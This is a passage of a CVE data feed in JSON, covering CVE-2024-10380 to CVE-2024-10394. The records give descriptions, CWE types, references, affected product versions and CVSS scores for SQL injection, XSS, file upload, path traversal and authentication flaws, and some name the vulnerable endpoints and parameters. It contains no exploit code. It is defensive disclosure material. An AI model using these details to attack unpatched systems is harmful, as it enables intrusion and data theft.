{ "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-01-02T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10380", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281810", "name" : "VDB-281810 | SourceCodester Petrol Pump Management Software ajax_product.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281810", "name" : "VDB-281810 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431174", "name" : "Submit #431174 | SourceCodester Petrol Pump Management Software 1.0 ajax_product.php SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/K1nako0/tmp_vuln5/blob/main/README.md", "name" : "https://github.com/K1nako0/tmp_vuln5/blob/main/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. Affected by this issue is some unknown functionality of the file /admin/ajax_product.php. The manipulation of the argument drop_services leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:petrol_pump_management:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-25T13:15Z", "lastModifiedDate" : "2024-11-01T16:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10381", "ASSIGNER" : "vdisclose@cert-in.org.in" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0328", "name" : "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0328", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "This vulnerability exists in Matrix Door Controller Cosec Vega FAXQ due to improper implementation of session management at the web-based management interface. A remote attacker could exploit this vulnerability by sending a specially crafted http request on the vulnerable device.\n\nSuccessful exploitation of this vulnerability could allow remote attacker to gain unauthorized access and take complete control of the targeted device." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:matrixcomsec:cosec_vega_faxq_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "v2r17", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:matrixcomsec:cosec_vega_faxq:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T13:15Z", "lastModifiedDate" : "2024-11-14T21:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10382", "ASSIGNER" : "security@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://developer.android.com/jetpack/androidx/releases/car-app#1.7.0-beta03", "name" : "https://developer.android.com/jetpack/androidx/releases/car-app#1.7.0-beta03", "refsource" : "", "tags" : [ "Release Notes" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "There exists a code execution vulnerability in the Car App Android Jetpack Library. CarAppService uses deserialization logic that allows construction of arbitrary java classes. This can lead to arbitrary code execution when combined with specific Java deserialization gadgets. An attacker needs to install a malicious application on victims device to be able to attack any application that uses vulnerable library. We recommend upgrading the library past version 1.7.0-beta02." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:androidx.car.app:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.4.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:androidx.car.app:1.7.0:alpha01:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:androidx.car.app:1.7.0:alpha02:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:androidx.car.app:1.7.0:beta01:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-20T11:15Z", "lastModifiedDate" : "2025-08-04T14:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10383", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/500785", "name" : "https://gitlab.com/gitlab-org/gitlab/-/issues/500785", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/500785", "name" : "GitLab Issue #500785", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://hackerone.com/reports/2765778", "name" : "HackerOne Bug Bounty Report #2765778", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An issue has been discovered in the gitlab-web-ide-vscode-fork component distributed over CDN affecting all versions prior to 1.89.1-1.0.0-dev-20241118094343and used by all versions of GitLab CE/EE starting from 15.11 prior to 17.3 and which also temporarily affected versions 17.4, 17.5 and 17.6, where a XSS attack was possible when loading .ipynb files in the web IDE" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.4.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.4.0:*:*:*:community:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.5.0:*:*:*:community:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.5.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.6.0:*:*:*:community:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.6.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "15.11.0", "versionEndExcluding" : "17.3.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "15.11.0", "versionEndExcluding" : "17.3.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2025-02-07T15:15Z", "lastModifiedDate" : "2025-08-14T19:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10385", "ASSIGNER" : "cvd@cert.pl" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cert.pl/en/posts/2024/12/CVE-2024-10385", "name" : "https://cert.pl/en/posts/2024/12/CVE-2024-10385", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.directadmin.com/evolution.php", "name" : "https://www.directadmin.com/evolution.php", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Ticket management system in DirectAdmin Evolution Skin is vulnerable to XSS (Cross-site Scripting), which allows a low-privileged user to inject and store malicious JavaScript code.\nIf an admin views the ticket, the script might perform actions with their privileges, including command execution. \nThis issue has been fixed in version 1.668 of DirectAdmin Evolution Skin." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-12-20T16:15Z", "lastModifiedDate" : "2024-12-20T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10386", "ASSIGNER" : "PSIRT@rockwellautomation.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1708.html", "name" : "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1708.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "CVE-2024-10386 IMPACT\n\n\n\nAn authentication\nvulnerability exists in the affected product. The vulnerability could allow a\nthreat actor with network access to send crafted messages to the device, potentially\nresulting in database manipulation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:14.0.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "11.2.0", "versionEndExcluding" : "11.2.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "12.0.0", "versionEndExcluding" : "12.0.8", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "12.1.0", "versionEndExcluding" : "12.1.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "13.0.0", "versionEndExcluding" : "13.0.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "13.1.0", "versionEndExcluding" : "13.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "13.2.0", "versionEndExcluding" : "13.2.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T17:15Z", "lastModifiedDate" : "2024-11-05T20:07Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10387", "ASSIGNER" : "PSIRT@rockwellautomation.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1708.html", "name" : "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1708.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "CVE-2024-10387 IMPACT\n\n\n\nA Denial-of-Service\nvulnerability exists in the affected product. The vulnerability could allow a\nthreat actor with network access to send crafted messages to the device,\npotentially resulting in Denial-of-Service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:14.0.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "11.2.0", "versionEndExcluding" : "11.2.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "12.0.0", "versionEndExcluding" : "12.0.8", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "12.1.0", "versionEndExcluding" : "12.1.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "13.0.0", "versionEndExcluding" : "13.0.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "13.1.0", "versionEndIncluding" : "13.1.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:rockwellautomation:thinmanager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "13.2.0", "versionEndIncluding" : "13.2.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-25T17:15Z", "lastModifiedDate" : "2024-11-05T20:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10388", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.welaunch.io/en/product/wordpress-gdpr/#changelog", "name" : "https://www.welaunch.io/en/product/wordpress-gdpr/#changelog", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bf707d9b-2b96-4d1b-b798-38f7fe958eaf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bf707d9b-2b96-4d1b-b798-38f7fe958eaf?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WordPress GDPR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gdpr_firstname' and 'gdpr_lastname' parameters in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:welaunch:wordpress_gdpr:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.0.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-19T08:15Z", "lastModifiedDate" : "2025-01-23T17:22Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10389", "ASSIGNER" : "security@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/google/safearchive/commit/f7ce9d7b6f9c6ecd72d0b0f16216b046e55e44dc", "name" : "https://github.com/google/safearchive/commit/f7ce9d7b6f9c6ecd72d0b0f16216b046e55e44dc", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "There exists a Path Traversal vulnerability in Safearchive on Platforms with Case-Insensitive Filesystems (e.g., NTFS). This allows Attackers to Write Arbitrary Files via Archive Extraction containing symbolic links. We recommend upgrading past commit f7ce9d7b6f9c6ecd72d0b0f16216b046e55e44dc" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:safearchive:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024-10-25", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-11-04T11:15Z", "lastModifiedDate" : "2025-07-23T19:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1039", "ASSIGNER" : "ics-cert@hq.dhs.gov" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-798" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Gessler GmbH WEB-MASTER has a restoration account that uses weak hard coded credentials and if exploited could allow an attacker control over the web management of the device." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:gesslergmbh:web-master_firmware:7.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:gesslergmbh:web-master:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-01T22:15Z", "lastModifiedDate" : "2025-08-07T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10390", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/07244763-3482-4cfb-8ae4-d19f312011aa?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/07244763-3482-4cfb-8ae4-d19f312011aa?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://codecanyon.net/item/elfsight-telegram-chat/25288599", "name" : "https://codecanyon.net/item/elfsight-telegram-chat/25288599", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Elfsight Telegram Chat CC plugin for WordPress is vulnerable to unauthorized modification of data to a missing capability check on the 'updatePreferences' function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-18T17:15Z", "lastModifiedDate" : "2024-11-19T21:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10391", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-07-09T23:15Z", "lastModifiedDate" : "2025-07-09T23:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10392", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3176122/gpt3-ai-content-generator#file508", "name" : "https://plugins.trac.wordpress.org/changeset/3176122/gpt3-ai-content-generator#file508", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd8a45c9-ca48-4ea6-b34e-f05206f16155?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd8a45c9-ca48-4ea6-b34e-f05206f16155?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The AI Power: Complete AI Pack plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'handle_image_upload' function in all versions up to, and including, 1.8.89. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-31T06:15Z", "lastModifiedDate" : "2024-11-01T12:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10393", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3186319/tutor", "name" : "https://plugins.trac.wordpress.org/changeset/3186319/tutor", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bf8aa169-df51-46db-8c65-f1543d4f75f9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/bf8aa169-df51-46db-8c65-f1543d4f75f9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Tutor LMS plugin for WordPress is vulnerable to bypass to user registration in versions up to, and including, 2.7.6. This is due to a missing check for the 'users_can_register' option in the 'register_instructor' function. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.7.6", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-21T11:15Z", "lastModifiedDate" : "2025-01-23T17:04Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10394", "ASSIGNER" : "patrick@puiterwijk.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://openafs.org/pages/security/OPENAFS-SA-2024-001.txt", "name" : "https://openafs.org/pages/security/OPENAFS-SA-2024-001.txt", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A local user can bypass the OpenAFS PAG (Process Authentication Group)\nthrottling mechanism in Unix clients, allowing the user to create a PAG using\nan existing id number, effectively joining the PAG and letting the user steal\nthe credentials in that PAG." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : 